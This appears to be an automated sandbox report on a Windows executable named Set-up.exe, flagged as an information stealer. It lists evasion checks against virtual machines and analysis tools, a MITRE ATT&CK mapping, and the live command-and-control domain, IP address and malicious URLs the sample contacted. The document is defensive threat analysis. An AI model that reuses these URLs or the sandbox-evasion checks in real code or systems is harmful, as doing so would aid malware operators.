Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000C77E0	0_2_000C77E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002197D0	0_2_002197D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00115830	0_2_00115830
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001AF850	0_2_001AF850
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000CB840	0_2_000CB840
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000D9880	0_2_000D9880
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0038D890	0_2_0038D890
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0039D8E0	0_2_0039D8E0

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001FC9B0 appears 81 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 000275A0 appears 528 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001FCBC0 appears 437 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001FA170 appears 46 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001D7310 appears 43 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001044A0 appears 77 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 000650A0 appears 49 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 003A8B80 appears 33 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00065340 appears 48 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00139720 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 0003CD40 appears 60 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 0003CCD0 appears 47 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001D7120 appears 48 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 000273F0 appears 93 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 000271E0 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 0002CAA0 appears 62 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00064F40 appears 294 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001D7220 appears 726 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00064FD0 appears 221 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 001FCA40 appears 82 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal76.troj.spyw.evad.winEXE@1/0@8/2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0003D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,

0_2_0003D090

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0002255D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_000229FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,

0_2_000229FF

Source: C:\Users\user\Desktop\Set-up.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Set-up.exe	ReversingLabs: Detection: 28%
Source: Set-up.exe	Virustotal: Detection: 32%

Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 7363720 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4dd200
Source: Set-up.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x152000

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_003B8D6A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,

0_2_003B8D6A

Source: Set-up.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF99CB pushfd ; iretd	0_3_00CF99CE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF99E9 pushfd ; iretd	0_3_00CF99EA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF99E5 pushfd ; iretd	0_3_00CF99E6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF9810 pushfd ; iretd	0_3_00CF9816
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF99CB pushfd ; iretd	0_3_00CF99CE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF99E9 pushfd ; iretd	0_3_00CF99EA
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF99E5 pushfd ; iretd	0_3_00CF99E6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CF9810 pushfd ; iretd	0_3_00CF9816
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDEF04 pushad ; ret	0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDEF04 pushad ; ret	0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDF420 push eax; ret	0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDF420 push eax; ret	0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CE9278 push es; iretd	0_3_00CE9279
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDEF04 pushad ; ret	0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDEF04 pushad ; ret	0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDF420 push eax; ret	0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00CDF420 push eax; ret	0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A41D0 push eax; mov dword ptr [esp], edx	0_2_003A41D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00240300 push eax; mov dword ptr [esp], 00000000h	0_2_00240305
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000C8640 push eax; mov dword ptr [esp], edx	0_2_000C8645
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0009C6D0 push eax; mov dword ptr [esp], edx	0_2_0009C6D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000DC7F0 push eax; mov dword ptr [esp], 00000000h	0_2_000DC743
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00060AC0 push eax; mov dword ptr [esp], 00000000h	0_2_00060AC4
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00181130 push eax; mov dword ptr [esp], edx	0_2_00181135
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00081430 push eax; mov dword ptr [esp], 00000000h	0_2_00081433
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0012B7E0 push eax; mov dword ptr [esp], 00000000h	0_2_0012B7E4

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\Set-up.exe

Code function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second

0_2_000229FF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Set-up.exe	Binary or memory string: PROCMON.EXE
Source: Set-up.exe	Binary or memory string: X64DBG.EXE
Source: Set-up.exe	Binary or memory string: WINDBG.EXE
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exe	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Set-up.exe

0_2_000229FF

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 6.4 %

Source: C:\Users\user\Desktop\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,	0_2_0002255D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000229FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,	0_2_000229FF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001FE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,	0_2_001FE270

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0002255D

Source: C:\Users\user\Desktop\Set-up.exe

0_2_0002255D

Source: Set-up.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe, 00000000.00000003.1811748473.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1813418338.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll "sv
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1692580363.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.1692006117.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

0_2_000229FF

Source: C:\Users\user\Desktop\Set-up.exe

0_2_003B8D6A

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0002116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_0002116C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00021160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_00021160
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000211A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_000211A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000213C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,	0_2_000213C9

Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_002093D0 GetSystemTime,SystemTimeToFileTime,

0_2_002093D0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_004F38F0 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,

0_2_004F38F0

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, Set-up.exe, 00000000.00000000.1661680610.0000000000599000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000000.1661680610.0000000000599000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 193.233.84.212:80

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0005A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,	0_2_0005A550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000EAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,	0_2_000EAA30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0006E520 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,	0_2_0006E520

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	17 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	29%	ReversingLabs	Win32.Infostealer.Tinba
Set-up.exe	32%	Virustotal		Browse

Source	Detection	Scanner	Label
https://httpbin.org/ip9	0%	Avira URL Cloud	safe
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836	100%	Avira URL Cloud	malware
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFn	100%	Avira URL Cloud	malware
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1	100%	Avira URL Cloud	malware
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.eleventh11pt.top	193.233.84.212	true	true		unknown
httpbin.org	52.73.63.247	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836	true	Avira URL Cloud: malware	unknown
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0	true	Avira URL Cloud: malware	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe	false		high
http://html4/loose.dtd	Set-up.exe	false		high
https://httpbin.org/ipbefore	Set-up.exe	false		high
https://httpbin.org/ip9	Set-up.exe, 00000000.00000003.1692006117.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	Set-up.exe	false		high
https://curl.se/docs/hsts.html#	Set-up.exe	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe	false		high
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFn	Set-up.exe, 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://.css	Set-up.exe	false		high
http://.jpg	Set-up.exe	false		high
http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1	Set-up.exe, 00000000.00000003.1811748473.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1813418338.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.233.84.212	home.eleventh11pt.top	Russian Federation		20549	FREE-MPEIRU	true
52.73.63.247	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582042
Start date and time:	2024-12-29 16:50:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal76.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 49 Number of non-executed functions: 157
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

